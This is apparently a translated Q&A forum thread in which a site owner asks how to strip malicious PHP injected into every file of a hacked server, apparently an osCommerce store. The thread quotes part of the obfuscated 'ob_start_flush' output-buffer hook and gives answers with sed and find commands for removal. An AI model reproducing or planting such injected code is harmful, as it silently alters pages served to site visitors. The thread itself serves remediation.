可能重复:
我的服务器被黑了 紧急求助
你好,
我急需你的帮助,因为服务器已被黑客入侵,我没有时间学习如何从所有文件中删除黑客的代码。我已将添加到所有文件的代码附加到附件中。此代码中有许多特殊字符,而且相当大。有时它会被添加到文件中两次。
我不太了解 sed,无法用它解决这个问题。如何从所有文件中排除这段代码?使用 sed、diff/patch 还是其他技术?
以下是要删除的部分代码:
<?php global $ob_starting;
if(!$ob_starting) {
function ob_start_flush($s) {
$tc = array(0, 69, 83, 84, 82, 67, 7, 79, 9, 8, 23, 73, 12, 76, 68, 78, 63, 24, 14, 19, 3, 65, 27, 17, 85, 70, 80, 16, 29, 11, 89, 86, 2, 66, 77, 93, 91, 71, 18, 72, 20, 75, 87, 22, 74, 13, 59, 61, 52, 37, 28, 35, 15, 1, 21, 25, 34, 92, 36, 41, 30, 88, 46, 33, 51);
$tr = array(50, 2, 5, 4, 11, 26, 3, 0, 3, 30, 26, 1, 28, 32, 3, 1, 61, 3, 52, 44, 21, 31, 21, 2, 5, 4, 11, 26, 3, 32, 60, 11, 25, 0, 9, 3, 30, 26, 1, 7, 25, 9, 4, 1, 14, 1, 25, 16, 5, 7, 13, 7, 4, 2, 8, 28, 28, 32, 24, 15, 14, 1, 25, 11, 15, 1, 14, 32, 8, 0, 36, 0, 0, 0, 31, 21, 4, 0, 14, 11, 31, 16, 5, 7, 13, 7, 4, 2, 0, 28, 0, 15, 1, 42, 0, 63, 4,
-------------
-------------
$i++; $s=substr($s,0,$i).$ob_htm.substr($s,$i);
return $s;
}
$ob_starting = time();
@ob_start("ob_start_flush");
我将非常感激您的帮助。谢谢。
更新:
I have tried using the code like:
for fname $(grep *.php .); do
while read; do
sed -i 's/$REPLY//' $fname
done < filem
done
其中 filem - 是包含恶意代码的文件。在这个文件中,我将所有特殊字符(如 $<( 等)替换为点 '.',但 sed 仍然会带来许多错误。
答案1
评论中的建议完全正确。您确实需要从备份中恢复,但如果黑客的代码与上面的示例完全一样,您可以尝试此操作(首先备份您的 webroot。)
sed -i '/<?php global $ob_starting;/,/@ob_start("ob_start_flush");/d' cleanme.php
要遍历 webroot 和所有子目录,你可以使用 find:
find $WEBROOT -type f -exec sed -i '/<?php global $ob_starting;/,/@ob_start("ob_start_flush");/d' {} \;
sed 会删除给定的起始和结束变量之间的所有内容。祝你好运。
答案2
你在使用 osCommerce 吗?也许你应该看看他们的支持论坛,似乎其他人也在处理几乎相同的问题 - 如果不了解问题所在就删除代码,很可能会导致问题再次发生
http://forums.oscommerce.com/topic/373376-hacked-by-code-global-ob-starting/
http://forums.oscommerce.com/topic/373373-site-hacked-should-you-upgrade-or-try-to-fix-it-as-it-is/